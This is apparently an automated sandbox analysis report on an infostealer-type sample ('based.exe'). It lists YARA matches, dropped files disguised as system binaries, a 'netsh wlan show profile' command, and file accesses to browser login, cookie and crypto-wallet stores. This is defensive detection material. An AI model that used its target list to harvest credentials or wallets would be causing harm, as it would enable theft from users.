                                  Source: Yara matchFile source: 00000006.00000003.1736293542.00000202B6EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000003.1736293542.00000202B6EA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 1700, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 6900, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI17002\rarreg.key, type: DROPPED
                                  Source: Yara matchFile source: 00000034.00000002.1960895196.000000001341B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 12.3.svchost.exe.5c4e6ea.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.3.svchost.exe.644e6ea.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 52.0.ChainComServermonitor.exe.af0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.3.svchost.exe.5c4e6ea.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.3.svchost.exe.644e6ea.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000000C.00000003.1760108075.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000003.1750025071.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000003.1761289490.0000000006400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000034.00000000.1797015711.0000000000AF2000.00000002.00000001.01000000.00000025.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Recovery\winlogon.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\dwm.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Recovery\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 6900, type: MEMORYSTR
                                  Source: Yara matchFile source: 12.3.svchost.exe.5c4e6ea.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.3.svchost.exe.644e6ea.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 52.0.ChainComServermonitor.exe.af0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.3.svchost.exe.5c4e6ea.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.3.svchost.exe.644e6ea.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Recovery\winlogon.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\dwm.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Recovery\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                                  Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
                                  Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
                                  Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
                                  Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: EthereumZ
                                  Source: based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystoreZ
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                                  Source: Yara matchFile source: 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 6900, type: MEMORYSTR

                                  Remote Access Functionality

                                  barindex
                                  Source: Yara matchFile source: 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000003.1736293542.00000202B6EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000003.1736293542.00000202B6EA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 1700, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 6900, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI17002\rarreg.key, type: DROPPED
                                  Source: Yara matchFile source: 00000034.00000002.1960895196.000000001341B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 12.3.svchost.exe.5c4e6ea.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.3.svchost.exe.644e6ea.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 52.0.ChainComServermonitor.exe.af0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.3.svchost.exe.5c4e6ea.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.3.svchost.exe.644e6ea.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000000C.00000003.1760108075.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000003.1750025071.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000003.1761289490.0000000006400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000034.00000000.1797015711.0000000000AF2000.00000002.00000001.01000000.00000025.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Recovery\winlogon.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\dwm.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Recovery\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 6900, type: MEMORYSTR
                                  Source: Yara matchFile source: 12.3.svchost.exe.5c4e6ea.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.3.svchost.exe.644e6ea.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 52.0.ChainComServermonitor.exe.af0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.3.svchost.exe.5c4e6ea.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.3.svchost.exe.644e6ea.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Recovery\winlogon.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe, type: DROPPED
